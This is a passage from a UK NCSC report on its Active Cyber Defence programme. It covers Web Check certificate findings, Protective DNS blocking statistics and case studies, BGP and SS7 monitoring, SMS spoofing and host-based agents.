of a zero day being discovered, but due to a false positive in one of the Web Check modules thatmade it erroneously appear as if a set of issues had been fixed. This was remediated quickly, butwe didn’t massage the data to remove the evidence. It doesn’t affect the rest of the data acrossthe year; remember this is issues that have been fixed, not discovered.

5.4 Case study: X.509 certificates

The X.509 test looks at a website’s certificates and checks for validity in a number of ways. Theadvisory which is issued to the user is one which can be positive as well as negative, meaningthat we can measure both ‘good’ certificate usage as well as ‘bad’. Figure 26 shows the numberof X.509 advisories issued in 2018, grouped by severity.

We would expect the total number of advisories given to rise in proportion to the numberof URLs scanned since we would expect almost all URLs to have a certificate, as we see infigure 26. We also see that the number of negative (‘urgent’ and ‘advisory’) advisories is relativelyflat, while the number of ‘positive’ advisories is increasing, showing that the number of ‘bad’certificate configurations is lower than expected. This implies that, over time, users of WebCheck maintain their certificate configurations relatively well. Given there is no obvious othercommon factor across this population, this appears to be a direct effect of using Web Check.

5.5 Third party resources

In February 2018, the popular web accessibility extension BrowseAloud was compromised bycriminals and modified to add cryptomining code. This meant that any website which includedthe BrowseAloud extension as a resource included the criminals’ modified version from thatpoint onwards and so visitors to those websites ran the criminals’ code without prompting or

52

Page 53: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Apr

May

Jun

Jul

Aug

Sep

Oct

Nov

Dec

0

100,000

200,000

300,000

400,000

500,000

Month (2018)

Nu

mb

erof

issu

es

PositiveUrgent or Advisory

Figure 26: Number of X.509-related advisories issued in 2018

notification because the site they were visiting imported BrowseAloud as a trusted resource.This means that all visitors to those sites were cryptomining on behalf of the criminals thatcompromised the BrowseAloud resource. The BrowseAloud extension was very widely used,including on a number of UK public sector websites.

We live in a world where component reuse and third party integration is very common andhelps people build more functional and usable websites more quickly and this isn’t a bad thing,in general. However, we are effectively trusting a bunch of third parties with our reputation indoing so. So, it’s probably a good idea to understand who these third parties are, and whetherthey deserve our trust. We have Web Check crawling data to help us with this.

In Table 17 we show the scale of third party resources used across the sites scanned byWeb Check. This is currently imperfect as Web Check only processes HTML and does notexecute any JavaScript as part of a site, so we may be missing some resources loaded byJavaScript. Given this appears to be interesting data, we’ll try to fix that in the next year.We also have a slightly gross definition of ‘third party’ today - namely that the resource is

not hosted on a ∗.gov.uk domain. That probably needs refining as well.

Scale Resource Type Number of sites10 or more sites All Resources 406

Active Resources 314100 or more sites All Resources 32

Active Resources 31

Table 17: Scale of third party resources used in Web Check-scanned sites

From this, we can see that there are a relatively small number of resources that are widely used

53

Page 54: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

across public sector sites. We will be looking into the character of these common resources anddetermining whether there is anything we can do to monitor their integrity and proactively informWeb Check users if the third party resources they import change. Incidentally, BrowseAloud isstill used on 148 sites scanned by Web Check.

5.6 Case study: Symantec certificates

In October, Symantec and their subsidiaries like Thawte, VeriSign, Equifax, GeoTrust, andRapidSSL had their certificates marked as untrusted by Google. According to Google, Symantechad been issuing certificates without the proper due diligence, and it became clear that Symanteccertificates were of limited value as this change in trust became prevalent. They’d given severalorganisations the ability to issues certificates ‘without the appropriate or necessary oversight,and had been aware of security deficiencies at these organizations for some time.’18

The release of Chrome 70 on October 18th marked a complete removal of trust in Symantec’sPKI infrastructure. This meant that if you visited a website with a Symantec or associatedcertificate, the website would show a security warning page instead of the actual site.

In order to try to minimize the impact of public sector sites, we wanted Web Check users tohave advanced warning, as obtaining new certificates can, rightly, be a somewhat arduous task.One of our security researchers, Jamie, authored a blog describing the issue and pointing publicsector organisations to Web Check. We also issued a Web Check warning for those users whohad affected certificates, a month or so before they were due to be untrusted. Figure 27 showsthe population of Symantec and associated certificates across public sector over the period justbefore Google’s ‘untrusting’ of them.

The rate of removal of these deprecated certificates is broadly similar across both populations.The population of sites using deprecated certificates at the time is dominated by Web Check users,which makes drawing useful conclusions difficult. However, it does appear that for an issue aspublic and serious as this one, all site owners respond broadly similarly whether they use WebCheck or not. This sort of issue is likely to happen again, whether related to certificates or not,and so it is good that we’ve proved that we can deploy new checks quickly and drive the rightbehaviour in our user population quickly.

5.7 Conclusion

Web Check’s user base continued to grow in 2018, allowing us to reach more organisations andhelp them ensure the basic security of their websites is maintained. We’ve seen that the newchecks introduced in 2018 are producing new insights for users whilst the checks introduced in2017 continue to produce advisories requiring action. The data here shows that simple thingsdone at scale can have a positive effect and that, at least for public sector sites, continuousnudging is needed to maintain the security of those sites.

18https://security.googleblog.com/2017/09/chromes-plan-to-distrust-symantec.html

54

Page 55: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

01-S

ep

10-S

ep

20-S

ep

30-S

ep

10-O

ct

20-O

ct

31-O

ct

10-N

ov

20-N

ov

30-N

ov

10-D

ec

0

100

200

300

400

Date (2018)

Nu

mb

erof

affec

ted

cert

ifica

tes

Web Check UsersAll Public Sector

Figure 27: Number of affected certificates

55

Page 56: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

6 Protective DNS

The Domain Name Service is the phonebook of the internet, translating human readable namesinto machine-usable IP addresses. A fuller description of this system was provided in last year’sreport and won’t be repeated here. DNS is used for a variety of things on the internet, not justlooking up addresses. For example, DMARC and related policies for a domain are published asDNS records. In this section, we are looking only at records that resolve to IP addresses, perhapsas part of a user browsing the internet or malware trying to contact its command and controlservers.

The Protective DNS (PDNS) service intends to be the recursive resolver of choice for publicsector organisations, instead of their ISP or managed service provider. The service brings infeeds of threat intelligence, including from the NCSC, and uses those plus analytics to helpstop those organisations that are using the service from accessing known malicious addresses.Here ‘malicious’ means doing something objectively bad that the user doesn’t intend - malwareconnections, credential stealing and so on. This service does not block access based on taste orcorporate policy, so users need to block porn, gambling and other classes of inappropriate contentin their own infrastructure. The PDNS service is limited to cyber security related badness.

6.1 DNS and numbers

DNS resolutions can be a bit weird. Recall that DNS is effectively implemented as a hierarchy,with each level in the hierarchy performing caching of resolution data, according to the ‘time tolive’ on the returned results. On the PDNS service, when we return a block or redirect for adomain, we set a low time to live - normally a few minutes - on the record. This is so that anyfalse positives can be rolled back quickly. Now, the enterprises that use the PDNS resolver willhave their own corporate resolver which is the local cache for their clients. This has the effect of‘smoothing’ the queries coming from any customer networks, with a single request to the PDNSresolver potentially representing more than one request from inside the customer network. Wealso know that certain security software will make queries to malicious domains. In some cases,this is a result of heuristic conviction of behaviour on a machine, sometimes it’s unrelated. Thesebehaviours are proprietary and specific to individual security software. We do not believe thatthis behaviour dominates the queries to the PDNS service. When taken together, these twobehaviours likely broadly cancel each other out. While the detection numbers here are likelybroadly representative of real customer issues, the precise numbers should be used carefully. It isworth noting that blocking characteristics and what the numbers mean will differ between DNSimplementations and architectures. Comparisons should not be done naively.

6.2 Last year in protective DNS

By the end of 2018, the service was protecting an estimated 1.4 million employees across the UKpublic sector. In total across 2018, the service answered 68.7 billion queries with the peak queryrate being 27,109 queries per second, seen in November. The peak queries received per month,in queries per second, is shown in figure 28. As expected, this grows as more organisations areonboarded to the service.

Of those 68.7 billion queries, we blocked access to 57.4 million for 118,527 unique reasons.There were 2416 unique customers (by source IP) that made a query that we blocked. Eachunique customer IP could represent a small organisation, or the entire public sector in a geo-graphic area using a common transport network. The point to take from this is that the majorityof our customers have had detections when using the PDNS service, rather than worry aboutthe precise number of customer IPs.

56

Page 57: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

10,000

15,000

20,000

25,000

Pea

kquer

ies

Figure 28: Peak queries per second in 2018

Of those blocks, 28 million of them were for domain generation algorithms (DGAs), including15 known DGAs. They included Ramnit, Suppobox, TinyBanker, Matsnu, Bedep, Fobber andConficker19.

We also blocked 13,800 queries for at least 20 named botnet command and control systems,including Betabot, Graybird, Katrina, Lokibot, StealRat and Godzilla. There were also a numberof exploit kit related indicators blocked. This included 796,000 queries for 16 unique indicatorsof exploit kits including Magnitude, RIG, SweetOrange and Neutrino.

Ransomware continues to be an issue globally. In 2018, the PDNS service blocked over 450,000WannaCry related queries from 15 different PDNS customers and over 230,000 queries relatedto the BadRabbit ransomware.

It’s not all about blocking stuff though. The intent for the service is both to protect systemsdirectly, but also help owners of systems get to the bottom of their problems and fix them. Ourservice users are helping us understand what would be useful to them in terms of dashboards andother information. Based on this, we should be releasing a new version of the customer portalin early 2019. We’ll detail some of that in the next report.

Overall, in 2018, we’ve seen a twelve-fold increase in terms of customers active on the service,where ‘active’ means they are actively sending queries, and a nearly five-fold increase in traffic.

In the last report, the service was relatively new and so we only published the last coupleof months of block data. Noting it’s a little bit weird, but to try to account for usage volumes

based on the time of year, Table 18 shows the volume of customers and blocks on the last twomonths of 2017 and 2018.

We can see that, even though we had an order of magnitude more active customers at theend of 2018, we blocked about half as many queries. It’s difficult to draw concrete conclusionsfrom this, but given the other data we expose here, it’s likely that we’re having the underlying

19Yes, Conficker. The same one from 2008. It’s still active somewhere in public sector.

57

Page 58: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

2017 2018Number of active accounts 21 253

Number of unique blocks(last two months of year only)

42,053 27,462

Table 18: Comparison of unique blocks for the last two months of 2017 and 2018

effect of making networks more secure, at least in a decent proportion of our customers. There’ssignificantly more analytic work to be done here, though.

An active account is one which is fully onboarded onto the PDNS service and is activelysending queries via the DNS. Moving all your systems to use a new DNS service is not trivial,and so it’s testament to our customers that more than 250 of them have now done so and arebeing actively protected.

Table 19 shows the progression of customer adoption over 2018, along with the number ofunique blocks over the same period. A unique block is the unique domain names that areblocked, each one only counted once per period. Figure 29 shows the unique blocks graphicallyand figure 30 shows the unique blocks per month normalised by active customers at the end ofthat month. That’s a particularly kludgy normalisation for two reasons. Firstly, customers comein very different flavours. There’s a big difference in the effect of the number of blocks froma small local authority versus a large central government department. We minimize the biasthis can introduce by using the unique blocks measure, which is effectively an indicator of theexistence of something that needs investigation. Secondly, customers are onboarded across themonth as they are ready, so we’re effectively amortising each customer’s initial detections acrossall the customers onboarded that month. We’re ignoring that effect as it’s likely to be small.

Month (2018)Active

Account CountUniqueBlocks

January 137 16,728February 146 1,543

March 159 4,061April 175 6,823May 185 7,009June 196 3,907July 202 10,094

August 216 21,119September 227 19,182October 224 14,146

November 246 14,193December 253 13,269

Table 19: Number of customers and unique blocks by the DNS service over 2018

6.3 Infrastructure

It’s obvious that people are going to attack our PDNS infrastructure. Our resolver fleet is in anAnyCast configuration, so the load is distributed across the physical bits of tin we have runningthe service. However, that doesn’t mean we’re immune from attack and all our customers havesecondary resolvers configured for resiliency should the worst happen. In December, the service

58

Page 59: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

5,000

10,000

15,000

20,000

Month (2018)

Nu

mb

erof

un

iqu

eb

lock

s

Figure 29: Number of unique blocks

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

20

40

60

80

100

120

Month (2018)

Nu

mb

erof

un

ique

blo

cks

Figure 30: Number of unique blocks, normalised by number of active organisations

59

Page 60: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

was subject to five different DDOS attacks with a peak load of about 12.5 Gbps. We hadboth short, bursty attacks that lasted a few minutes and more attritional attacks. So far, we’vemaintained 100% service availability, but this shows the need to both build resilient infrastructureand have secondary resolvers configured, even if they lack the cyber security protection we buildinto the main service.

6.4 Feeds

The effectiveness of the PDNS service relies on the quality of the data we use to block maliciousdomains. As described last year, we did a bake-off20 of multiple feeds and procured ones thatseemed to have minimal overlap and reasonably high quality. As of the end of 2018, we have fivethreat feeds going into PDNS. Table 20 shows the effect each feed had in December 2018.

Unique Blocks False Positives % Feed UsedFeed 1 1,225 2 4%Feed 2 9,960 0 81%Feed 3 6,321 0 87%Feed 4 1,170 0 2.4%Feed 5 9 0 99%

Table 20: Effect of each threat feed in December 2018

By observation we can see that the number of validated false positives is very low at only twofor the month. It is also trivial to observe that feeds 1 and 4 are very underutilised, with onlyusing a small percentage of the provided data actually used. Feed 4 contains a large proportionof domains related to sending of spam which are of little use to the PDNS service and so are notused, but the remaining data in this feed is useful. Feed 1 turns out to be low quality and wecannot trust the accuracy of the vast majority of the domains marked as malicious in this feed.The small percentage of the data we do use is that of the absolute highest confidence from thevendor. At the end of 2018, we were in the process of running a procurement for an alternativevendor as this feed is not of sufficient quality to drive the service. This does show that threatintelligence feeds, even from reputable vendors, are often of variable quality in actual use andhave specific biases in terms of the type and quality of the data provided.

Part of the unique value the NCSC can provide is our own high quality, low volume threatfeed, concentrating on the most serious threats we see. We are trialling this with the PDNSservice in advance of wider sharing. In the period September to December 2018, 2,783 maliciousdomains were added to the PDNS block list directly by the NCSC.

Users of any threat intelligence feed (including an NCSC one) should invest the effort neces-sary to understand the real characteristics of the data in the feed, and the confidence that shouldbe applied to each class of indicator.

False positives and overblocking are a real concern with any blocking system, DNS or other-wise. In 2018 there were 62 false positives, 37 of which were proactively identified by the PDNSingest process run by Nominet before they became customer impacting. However, due to ourconstant review and optimisation of our processes, only 6 of these occurred in the last half of2018.

As well as blocking based on feeds, we continue to implement heuristics in scoring maliciousdomains and this remains an area of active research. In order to guarantee service in the face

20For non-UK readers, an informal competition to select something based on a limited set of criteria.

60

Page 61: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

of an undetected false positive, we have undertaken several iterations of dynamic whitelisting toensure connectivity to common and business critical services.

6.5 Customer case studies

6.5.1 Remediating a worm at a local authority

In some cases, PDNS can help customers discover unprotected parts of their infrastructure. InJune, a local authority network was flagged as behaving as though infected with Ramnit, a wormwhich affects Windows systems. The local authority was duly notified and they investigated withthe network owner. The network in question was a primary school which the local authority hadoverall responsibility for, but the IT support was provided by a third party. The antivirus thatwas installed on the school’s endpoints was not working, unbeknown to the local authority orthe school. As a result the estate had a wide level of infection. Not only did PDNS block themalicious connections, containing any harm, it also identified the malware and notified the localauthority.

The fix was uncomplicated. The local authority installed a working antivirus and it cleanedup the infection and PDNS logs show that the clean-up appeared to complete within a day. Fromour logs, we can see the remediation in action, as shown in figure 31.

31-M

ay01

-Ju

n02

-Ju

n03

-Ju

n04

-Ju

n05

-Ju

n06

-Ju

n07

-Ju

n08

-Ju

n09

-Ju

n10

-Ju

n11

-Ju

n12

-Ju

n13

-Ju

n14

-Ju

n15

-Ju

n16

-Ju

n17

-Ju

n18

-Ju

n19

-Ju

n20

-Ju

n21

-Ju

n22

-Ju

n23

-Ju

n24

-Ju

n

0

100,000

200,000

300,000

400,000

Date (2018)

Nu

mb

erof

blo

cks

Figure 31: Remediation of a Ramnit infection

It is worth noting that this was a significant infection as this estate had immediately previously

61

Page 62: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

been responsible for an estimated two thirds of all the blocks on the PDNS service.

6.5.2 USB infection

PDNS looks for indicators of compromise, but is neutral about the method of compromise. Itfinds indicators of malware that has been installed by a phishing attack or has been introducedthrough an infected USB mass storage device, or any other delivery vector.

One public sector organisation was getting a very large and weirdly consistent number ofconnections to dodgy websites. PDNS notified the organisation and they investigated theirinfrastructure. They traced the malware to initial infection through a malicious USB stick beingplugged into the network. In this case, the removal of the malware was more complicated andthey enlisted the help of some external partners to clean up their network.

Figure 32 shows the number of blocked connections before and after the malware removal.The number of daily blocks before the removal is very consistent - it only varies by 5, with thehighest number of daily blocks being 2,857. This level of consistency indicates an automatedprocess, almost certainly a ‘first stage’ infection that could not progress to a more harmful secondstage because of the effect of the PDNS service.

21-A

pr

22-A

pr

23-A

pr

24-A

pr

25-A

pr

26-A

pr

27-A

pr

28-A

pr

29-A

pr

30-A

pr

01-M

ay

02-M

ay

03-M

ay

04-M

ay

08-M

ay

09-M

ay

0

500

1,000

1,500

2,000

2,500

3,000

Date (2018)

Nu

mb

erof

blo

cks

Figure 32: Traffic from a USB-installed malware infection

After the malware was removed, the number of blocks for this particular organisation wentfrom 2, 852 on the 30th April to 1 on the 2nd of May.

In this instance, PDNS was able to provide vital information to help the information securityteam locate and remove the malware, while managing the potential harm until remediation wasachieved.

62

Page 63: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

6.5.3 Multiple internet connections

In the previous two case studies, the PDNS service helped to identify malicious software thathad somehow bypassed the organisation’s existing security solutions and helped mitigate thepotential harm. Regardless of their network build, security competence or business, all modernorganisations suffer from a common problem, the pesky ‘need to be connected to the Internet’problem. Organisations of any reasonable scale will end up with multiple internet connections.The problem is that they may not know about all of them at a corporate security level.

In August 2018, the PDNS service began seeing many malicious connections from a largepublic sector organisation which deals with sensitive information. The service blocked the con-nections and notified the organisation, who then investigated. Figure 33 shows the blocks involvedin this incident.

28-

Ju

l

29-

Ju

l

30-J

ul

31-J

ul

01-A

ug

02-A

ug

03-A

ug

0

500

1,000

1,500

2,000

2,500

Date (2018)

Nu

mb

erof

blo

cks

Figure 33: Number of blocks relating to unauthorised software

The investigation uncovered a previously-unknown connection to the internet which employ-ees were using to download unauthorised software, among other things. Attackers had made useof the unprotected internet connection to get an initial presence in the network and then pivotedfurther in, landing on devices which were protected by the PDNS service, leading to detection.

As is obvious from figure 33, once the organisation knew about the malware, they were able tofully remove it from their network. They were also able to put protection around the previously-unknown internet connection and onboard it onto the PDNS service. That’s one less way intothat organisation.

63

Page 64: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

6.6 IPv6

IPv6, the next generation of internet protocol, is still not widely used. In November and Decem-ber, we saw very small amounts of IPv6 queries when compared to IPV4 requests:

Date (2018) IPv4 Requests IPv6 Requests01 Nov 2,000,066,900 60,47206 Nov 2,046,132,415 60,42713 Nov 2,154,085,587 60,48521 Nov 2,217,939,756 60,44627 Nov 2,249,342,991 60,46305 Dec 2,262,208,216 60,47212 Dec 2,292,671,634 60,45019 Dec 2,291,329,751 60,47724 Dec 2,138,858,623 60,465

Table 21: Comparison of volume of IPv4 and IPv6 requests

It’s interesting to note that the volume of IPv6 queries is very consistent, suggesting thatthey are being generated by some kind of automated process rather than being down to normaluser browsing. This suggests that networks haven’t actually transitioned to IPv6 in any realsense of the word, and these are likely to be default configurations of particular services.

Recent history would suggest that IPv6 adoption at scale isn’t going to happen any timesoon, but we are following the data on IPv6 to make sure our guidance and advice is consistentwith how protocols are being used.

6.7 Automated sharing

The PDNS service now shares ‘fact of’ block events with an external MISP instance. More detailis provided in section 11. We are also trialling an automated declassification and action systemthat allows NCSC analysts to declassify and release classified indicators of compromise to protectthe UK, starting with the public sector PDNS service. At the end of September 2018, the trialof the automated sharing system was started. Analysts within NCSC can, with the press ofa button, send indicators to the PDNS service, with automated legal and policy checks beingapplied as the indicator is declassified. This process takes only seconds. The end result is thatNCSC analysis can directly protect the public sector through the PDNS service in a low frictionway. Work is underway to expand the external partners that can benefit from this data. To givean example of scale, in one week NCSC analysts declassified and released four domains to thePDNS service which blocked access 21 times.

6.8 Unintended benefits

Our researchers have begun exploring additional ways to use the data created as part of the nor-mal operation of the PDNS service to help our users. One strand of work showing some promiseis about trying to help users better understand the technologies in use on their networks, usingonly DNS resolution data. Most modern software calls out to pre-defined domains for varioushousekeeping and telemetry reasons, for example to check for software updates or license status.Some modern services require configuration through ‘discovery’ domains whereby subdomainsof a specific form are created, for example to expose an identity federation point. These all end

64

Page 65: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

up being queried through the PDNS service and we can do some data science on the resultingqueries and responses to try to infer the use in end networks of particular technologies.

Our first experiment is an adaptation of some academic research to determine the presence ofspecific operating systems in customer networks. Windows XP typically looks for updates oncea day by connecting to www.update.microsoft.com, the DNS record for which has a TTL of 60minutes, making it likely that we’ll see a number of requests on the PDNS service. No otherversion of Windows or any other software routinely connects to this domain. We look for periodicrequests to this domain from customer networks (a one-off connection could be a visitor or otheranomaly) and record domains where the DNS traffic looks like there’s at least one Windows XPmachine on the customer network 21. From this experiment, we’re pretty confident that at least168 unique organisations routinely use Windows XP. Many customers have unique registrationson the service for particular networks, and so we can say with some confidence that at least318 unique networks have evidence of routine use of Windows XP. There’s a tendency for thesenumbers to be on the low side, both because we’re being relatively conservative in this earlyexperiment and because some customers represent shared services organisations, for example aregional connectivity partnership that would hide the individual networks behind it.

Next steps in this work include trying to build analytics that give an estimate for the numberof machines running each piece of software we look for and to expand the types of softwareand services this analytic tries to detect. The intent is to give network administrators betterinformation to help them manage their security risks and to help NCSC work out where we shouldinvest our research effort; if lots of customers start using a new piece of software or service, weshould look into the security of it. Finally, we hope to be able to provide automated vulnerabilitynotification. If a CVE is registered against a particular product (or the vendor releases a patch),we should be able to determine which organisations are running the product and inform themin a very timely manner. This is cool.

There will be ongoing research into the value that the DNS resolution data on the PDNSservice can bring to customers and the NCSC, on top of the direct cyber security benefit ofblocking access to malicious domains.

6.9 Conclusion

The PDNS service has proven its value already, providing a real protective effect at scale tothe subscribed customers. In the next year of service, we are intending to retender the serviceand look to onboard more public sector customers. Tuning and categorising the feeds will beimportant as we share more detections to ensure that any overblocking is minimised. Newfeatures that provide better service, better actionable intelligence for our customers and morecyber security benefit (over and above blocking malicious domains) will also be coming online in2019. DNS is cool.

21There’s a bit more to it than as described here, but this gives the general idea.

65

Page 66: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

7 Routing and signalling

7.1 BGP

Border Gateway Protocol (BGP) is a protocol which determines how internet traffic should berouted. The internet is made up of many smaller networks called ‘Autonomous Systems’ (AS)which are run and managed by various companies across the world. Today, there are nearly90,000 AS worldwide. BGP was developed at a time when there were many fewer AS and sothere was more trust in networks and the route cost data they advertised. Each AS advertisesthe cost of getting to further destinations using its network via BGP which allows for resilientrouting across the various systems.

The problem is that BGP is a truly terrible protocol with no authentication or integrity onthe BGP path updates, so it’s easy for any participant in the protocol to lie and pretty mucharbitrarily reroute large swathes of internet traffic. There have been a few examples of this inthe public domain, for example when a good proportion of Google’s IP space was hijacked toroute via China and a similar event involving AWS traffic. There are cryptographic extensionsto BGP which try to solve part of this problem. Unfortunately, the cost of implementation isdisproportionately high and the current protocol extensions don’t actually fix the majority ofthe problems we see. The problems we now face with BGP is a good lesson about getting trustmodels right in distributed, global systems.

7.2 Source address spoofing

Last year, we talked about the intent to reduce the capability of UK IP space to participatein attacks that need source address spoofing and the changes needed to enforce that. We alsotalked about the preferred measurement method for this - getting ISPs to use the Spoofer projectfrom The Center for Applied Internet Data Analysis (CAIDA). Last year, we reported thatSpoofer tested around 1700 /24 IPv4 blocks, or about 0.74% of the reachable IP space delegatedto the UK. Unfortunately, this year, Spoofer seems to have only tested 1531 /24 IPv4 blockswhich remains statistically insignificant. We will seek to find other ways to increase fidelity ofmeasurement.

7.3 BGP monitoring

Today, there is no foolproof way of detecting BGP path update anomalies as part of normaloperation of the protocol. The next best thing would be to detect weird22 BGP updates andeither notify the affected ISP or, better still, automatically unwind the update to stop traffichijacks. We have developed a proof of concept BGP Monitoring Platform, working with BT.It establishes BGP peerings with multiple AS in order to collect different views of the internetrouting table. A BGP peering is where two routers create a BGP Connection in order to exchangeinformation. Peerings included BTs UK network (AS2856), BTs European (AS5400) and rest-of-world (AS3300) networks. As the data was ingested, a set of analytics were run to try to detectany weird path updates or IP prefix advertisements. Any weirdness generated an alert which waspushed to a dashboard, to allow analysts to investigate. With anything BGP related, diversity ofdata is key in order to get multiple ‘views’ of the traffic routing and cost model. So, we want toingest as many BGP announcement sources as possible. For the experimental platform, the bulkof the BGP announcement data is being collected from the RouteViews repositories, with some

22‘Weird’ is probably the best description of a potentially malicious BGP update. Updates are very contextspecific and are affected by real world events like networks going down or unintended digger/fibre bundle interfaces.The same update could be deemed fine on one context and weird in another.

66

' '

Page 67: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

reference sources used for IP and Geo location. BT is providing BT's BGP announcement

data for AS2856, AS5400 and AS3300. Using these data and the basic analytics we have tri-alled, we have shown that the platform can already automatically detect certain classes ofBGP hijacks, correctly analyse the problem and report the event to an analyst for investiga-tion.

In 2019, we will be further developing the platform by rebuilding the experimental platformin a commercial cloud hosting environment to allow better scaling and connectivity, onboardingmore UK ISPs onto the platform to get higher fidelity BGP announcement data for the prefixeswe care about, and building up the library of analytics that run on the streaming BGP updates.

Our intent is that during 2019, we will have both simple change detection (based on changesin ASN paths and ASN owners) and some more complex analytics. These are likely to include :

• Geo analysis of updates : is the geolocation of the network range unusual when comparedto the geolocation breakdown of the new ASN on the path?

• Changes to ‘important’ IP ranges : are important services, like DNS servers, being hijackedfrom the point of view of a customer?

• Matching BGP ownership with registrar information on the same network ranges : differ-ences should be interesting.

• Building a ‘baseline’ of an ASN view : if we can build a model for what ‘normal’ 23 lookslike for a particular ASN, weird changes should be easy to highlight.

We also intend to build a set of analyst tools to help visualise and investigate complex BGPdata. To start with, we’ll be working with IPv4 updates. We’ll look to BGP6 at some point inthe future.

7.4 SS7

Signalling System No 7 (SS7) is the protocol by which international telecoms networks talk toeach other in order to route calls, send SMS and allow users to roam between countries. It wasoriginally created in 1975 and has undergone little fundamental change since then. SS7 has noreal security built in and given how the telecoms sector has evolved it can now be trivial to exploitSS7 weaknesses, depending on the network. Exploiting those weaknesses can allow an attacker togeolocate a user’s phone, reroute SMS messages and voice calls so that they can be intercepted,get networks to release encryption keys and other nefarious actions. It is impractical to expect achange in the standard for SS7, but we believe we can better protect users of UK networks fromthese sorts of attacks while simultaneously ensuring that the next generation telecoms signallingprotocol (DIAMETER) is better secured.

Last year, we talked about doing some independent testing of the UK SS7 signalling ter-minations to see if they have correctly implemented the GSMA’s basic guidance for filteringSS7 messages (GSMA document FS.21) and whether those filters had the desired effect. We’vecompleted that testing and the results aren’t fantastic with all the tested networks falling shortin some way and some of them quite seriously. We’re now working with those networks to tryto fix some of these issues. Since SS7 is the way that UK telephony connects to the rest of theworld, including some adversaries, this needs to be done very carefully to make sure we don’taccidentally turn the UK into a communications island!

One of the other discoveries from the SS7 work is that a small number of UK registeredGlobal Titles24 seem to responsible for a disproportionate volume of malicious SS7 traffic. We

23As ‘normal’ as BGP can get!24Global Titles are effectively the international dialling prefix for a network and are used to uniquely identify

that network in the global signalling system.

67

Page 68: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

aren’t 100% sure of why this is yet and will be working with the owners of those Global Titlesto better understand what’s going on and how we could fix it.

7.5 SMS

Last year, we talked about extending an experiment done with HMRC to better control the useof certain SMS alphanumeric ‘from addresses’ 25 to help with smishing, or phishing over SMS.We now have a project running with industry, led by the Mobile Ecosystem Forum, called ‘SMSSenderID Protection Registry’, announced here26. The idea is to build a register of protectedTPOAs which aggregators and mobile operators will use to better manage SMS abuse. This isstill in its early stages but does look very promising. We are seeing some interesting edge casesalready, much like people did as we started the journey to secure email. These all seem to bemanageable in the long term though. The trick will be making it self sustaining once we stopfunding the programme.

Smishing attacks work in a very similar way to phishing attacks. They attempt to confusethe recipient into having trust in the message and then clicking an embedded link which takesthem to a site which normally attempts to harvest credentials and the like. Malware installover smishing attacks is rare today. One of the things we have been investigating is whether wecould automate takedowns of phishing sites that drive traffic over SMS in the same way we doover email. We have been working with the Information Commissioner’s Office and the mobileindustry in the UK to get access to a centralised reporting point for weird SMS. We have a proofof concept that takes reported SMSs and extracts any URLs embedded and puts them into ourstandard takedown pipeline. This could be productionised in 2019, subject to agreement withthe Information Commissioner’s Office and the network operators.

25Strictly, the Transport Path Originating Address (TPOA).26https://mobileecosystemforum.com/2018/11/27/sms-senderid-protection-registry-announced/

68

Page 69: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

8 Host-based capability

Host-Based Capability (HBC) is a new part of the ACD portfolio. It is a software agent whichis deployed on public sector endpoints which collects and analyses technical metadata to helppublic sector system owners understand the security of those systems. The data are used to detectmalicious activity, provide monthly threat surface reporting, and assess exposure to serious cyberthreats (e.g. WannaCry). Obviously, the agent must be installed by the owner of the system,but they all communicate back to a central function at NCSC for analysis.

The agent and the analysis platform are actually provided by one of our close partners andwe are limited by their policy in what we can say. We’re working with them to get to a point thatwe can be provide much more detail, but this year we’re very limited in what we can publish.

At the conclusion of the project’s pilot year, the service has been deployed to 26,000 gov-ernment devices across 5 departments. Seven incidents have been identified using this service,and 15 ‘Threat Surface Reports’ have been delivered to network owners. These Threat SurfaceReports provide actionable cyber security metrics to departments. Examples include:

• operating system versions, common software versions and time taken to patch

